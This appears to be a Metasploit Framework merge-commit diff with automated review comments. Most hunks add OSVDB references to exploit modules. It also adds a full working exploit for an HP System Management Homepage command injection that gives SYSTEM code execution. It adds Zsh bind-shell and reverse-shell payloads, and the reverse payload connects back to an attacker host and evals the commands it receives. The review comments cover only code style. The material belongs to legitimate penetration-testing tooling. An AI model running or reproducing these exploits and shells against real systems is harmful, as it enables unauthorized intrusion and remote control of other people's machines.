Merge branch 'master' of https://github.com/rapid7/metasploit-framework
commit
785639148c
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-0422' ],
|
||||
[ 'OSVDB', '89059' ],
|
||||
[ 'US-CERT-VU', '625617' ],
|
||||
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
|
||||
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
|
||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '77492' ],
|
||||
[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
|
||||
[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
|
||||
[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],
|
||||
|
|
|
@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ],
|
||||
[ 'OSVDB', '94441' ],
|
||||
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ],
|
||||
[ 'OSVDB', '78480' ],
|
||||
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
|
||||
[ 'OSVDB', '64171' ],
|
||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
|
||||
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
|
||||
],
|
||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
|
||||
[ 'OSVDB', '64171' ],
|
||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
|
||||
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
|
||||
],
|
||||
|
|
|
@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '20422'],
|
||||
['BID', '55399']
|
||||
[ 'OSVDB', '85509' ],
|
||||
[ 'EDB', '20422 '],
|
||||
[ 'BID', '55399 ']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
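Review bot: The rewritten EDB and BID entries carry a trailing space inside the identifier string (`'20422 '`, `'55399 '`) that the removed lines did not have, so the reference id is no longer the bare number and presumably ends up in whatever link the framework builds from it. They should read `[ 'EDB', '20422' ],` and `[ 'BID', '55399' ]`. The enclosing `initialize`/`update_info` call starts and ends outside the hunk.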
@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
|
||||
['CVE', '2013-0209'],
|
||||
['URL', 'http://www.sec-1.com/blog/?p=402'],
|
||||
['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
|
||||
[ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate)
|
||||
[ 'CVE', '2013-0209' ],
|
||||
[ 'OSVDB', '89322' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=402' ],
|
||||
[ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ]
|
||||
],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
|
|
|
@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-5159' ],
|
||||
[ 'OSVDB', '85739' ],
|
||||
[ 'EDB', '21834' ],
|
||||
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2013-0156'],
|
||||
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
|
||||
[ 'CVE', '2013-0156' ],
|
||||
[ 'OSVDB', '89026' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
|
||||
],
|
||||
'Platform' => 'ruby',
|
||||
'Arch' => ARCH_RUBY,
|
||||
|
|
|
@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
|
||||
#['OSVDB', ''],
|
||||
#['EDB', ''],
|
||||
[ 'OSVDB', '85446' ],
|
||||
[ 'EDB', '20500' ],
|
||||
[ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2011-3230'],
|
||||
['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
|
||||
['URL', 'http://support.apple.com/kb/HT5000']
|
||||
[ 'CVE', '2011-3230' ],
|
||||
[ 'OSVDB', '76389' ],
|
||||
[ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ],
|
||||
[ 'URL', 'http://support.apple.com/kb/HT5000' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-3485' ],
|
||||
[ 'OSVDB', '84706' ],
|
||||
[ 'EDB', '20443' ],
|
||||
[ 'URL', 'http://blog.zx2c4.com/791' ]
|
||||
],
|
||||
|
|
|
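--- /dev/null
+++ b/PLACEHOLDER_PATH_1
@@ -0,0 +1,178 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::CmdStagerTFTP
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection",
+'Description' => %q{
+This module exploits a vulnerability found in HP System Management Homepage. By
+supplying a specially crafted HTTP request, it is possible to control the
+'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
+which will be used in a exec() function. This results in arbitrary code execution
+under the context of SYSTEM. Please note: In order for the exploit to work, the
+victim must enable the 'tftp' command, which is the case by default for systems
+such as Windows XP, 2003, etc.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Markus Wulftange',
+'sinn3r' #Metasploit
+],
+'References' =>
+[
+['CVE', '2013-3576'],
+['OSVDB', '94191'],
+['US-CERT-VU', '735364']
+],
+'Payload' =>
+{
+'BadChars' => "\x00"
+},
+'DefaultOptions' =>
+{
+'SSL' => true
+},
+'Platform' => 'win',
+'Targets' =>
+[
+['Windows', {}],
+],
+'Privileged' => false,
+'DisclosureDate' => "Jun 11 2013",
+'DefaultTarget' => 0))
+
+register_options(
+[
+Opt::RPORT(2381),
+# USERNAME/PASS may not be necessary, because the anonymous access is possible
+OptString.new("USERNAME", [false, 'The username to authenticate as']),
+OptString.new("PASSWORD", [false, 'The password to authenticate with'])
+], self.class)
+end
+
+
+def peer
+"#{rhost}:#{rport}"
+end
+
+
+def check
+cookie = ''
+
+if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+cookie = login
+if cookie.empty?
+print_error("#{peer} - Login failed")
+return Exploit::CheckCode::Safe
+else
+print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+end
+end
+
+sig = Rex::Text.rand_text_alpha(10)
+cmd = Rex::Text.uri_encode("echo #{sig}")
+uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
+
+req_opts = {}
+req_opts['uri'] = uri
+if not cookie.empty?
+browser_chk = 'HPSMH-browser-check=done for this session'
+curl_loc = "curlocation-#{datastore['USERNAME']}="
+req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
+end
+
+res = send_request_raw(req_opts)
+if not res
+print_error("#{peer} - Connection timed out")
+return Exploit::CheckCode::Unknown
+end
+
+if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
+return Exploit::CheckCode::Vulnerable
+end
+
+Exploit::CheckCode::Safe
+end
+
+
+def login
+username = datastore['USERNAME']
+password = datastore['PASSWORD']
+
+cookie = ''
+
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => '/proxy/ssllogin',
+'vars_post' => {
+'redirecturl' => '',
+'redirectquerystring' => '',
+'user' => username,
+'password' => password
+}
+})
+
+if not res
+fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
+end
+
+# CpqElm-Login: success
+if res.headers['CpqElm-Login'].to_s =~ /success/
+cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+end
+
+cookie
+end
+
+
+def setup_stager
+execute_cmdstager({ :temp => '.'})
+end
+
+
+def execute_command(cmd, opts={})
+# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
+uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
+
+req_opts = {}
+req_opts['uri'] = uri
+if not @cookie.empty?
+browser_chk = 'HPSMH-browser-check=done for this session'
+curl_loc = "curlocation-#{datastore['USERNAME']}="
+req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+end
+
+print_status("#{peer} - Executing: #{cmd}")
+res = send_request_raw(req_opts)
+end
+
+
+def exploit
+@cookie = ''
+
+if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+@cookie = login
+if @cookie.empty?
+fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
+else
+print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+end
+end
+
+@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
+setup_stager
+end
+end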
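Review bot: In `login`, `res.headers['Set-Cookie'].scan(...)` raises NoMethodError when a response whose CpqElm-Login header says success carries no Set-Cookie header, because `scan` is then called on nil; `cookie = res.headers['Set-Cookie'].to_s.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''` keeps the empty-cookie fallback the line already intends. The credential gate is duplicated between `check` and `exploit`, and the cookie-header assembly between `check` and `execute_command`; a small private `cookie_header(cookie)` helper would keep the two copies in step. `if not a.empty? and not b.empty?` is the same test as `unless a.empty? || b.empty?`, which avoids the precedence traps of `and`/`not`, and the `res` assigned at the end of `execute_command` is never read. When credentials are supplied and `login` returns an empty cookie, `check` answers `CheckCode::Safe` although nothing about the target's vulnerability was established; `CheckCode::Unknown` describes that outcome more accurately.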
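--- /dev/null
+++ b/PLACEHOLDER_PATH_2
@@ -0,0 +1,62 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit4
+
+include Msf::Payload::Single
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Unix Command Shell, Bind TCP (via Zsh)',
+'Description' => %q{
+Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
+often available, please be aware it isn't usually installed by default.
+},
+'Author' =>
+[
+'Doug Prostko <dougtko[at]gmail.com>'
+],
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'zsh',
+'Payload' =>
+{
+'Offsets' => { },
+'Payload' => ''
+}
+))
+end
+
+#
+# Constructs the payload
+#
+def generate
+return super + command_string
+end
+
+#
+# Returns the command string to use for execution
+#
+def command_string
+cmd = "zmodload zsh/net/tcp;"
+cmd << "ztcp -l #{datastore['LPORT']};"
+cmd << "ztcp -a $REPLY;"
+cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
+cmd << "ztcp -c"
+cmd
+end
+end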
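Review bot: `generate` uses an explicit `return super + command_string`; the method's last expression is already its value, so `super + command_string` alone is the idiomatic form. `command_string` grows the script by appending to a string literal with `<<`, which would fail once the file adopts `# frozen_string_literal: true`; a single interpolated string, or an array of the fragments joined with `;`, builds the same text without mutating a literal. The reverse-TCP variant of this payload in the next section defines the same two methods and both remarks apply there as well.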
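--- /dev/null
+++ b/PLACEHOLDER_PATH_3
@@ -0,0 +1,48 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Unix Command Shell, Reverse TCP (via Zsh)',
+'Description' => %q{
+Connect back and create a command shell via Zsh. Note: Although Zsh is often
+available, please be aware it isn't usually installed by default.
+},
+'Author' => 'Doug Prostko <dougtko[at]gmail.com>',
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Handler' => Msf::Handler::ReverseTcp,
+'Session' => Msf::Sessions::CommandShell,
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'zsh',
+'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+))
+end
+
+def generate
+return super + command_string
+end
+
+def command_string
+cmd = "zmodload zsh/net/tcp;"
+cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
+cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
+cmd << "ztcp -c"
+cmd
+end
+end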
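Review bot: `generate` and `command_string` carry none of the header comments their counterparts in the bind-TCP variant have; a `# Constructs the payload` comment above `generate` and `# Returns the command string to use for execution` above `command_string` would keep the two sibling modules documented alike. `'Author'` is a bare string here but a one-element array in the bind variant; this page shows both forms in use, so presumably both are accepted, but the pair should agree on one. The `'Payload'` hash is written on a single line here and spread over four in the bind variant, another small divergence worth settling in one direction.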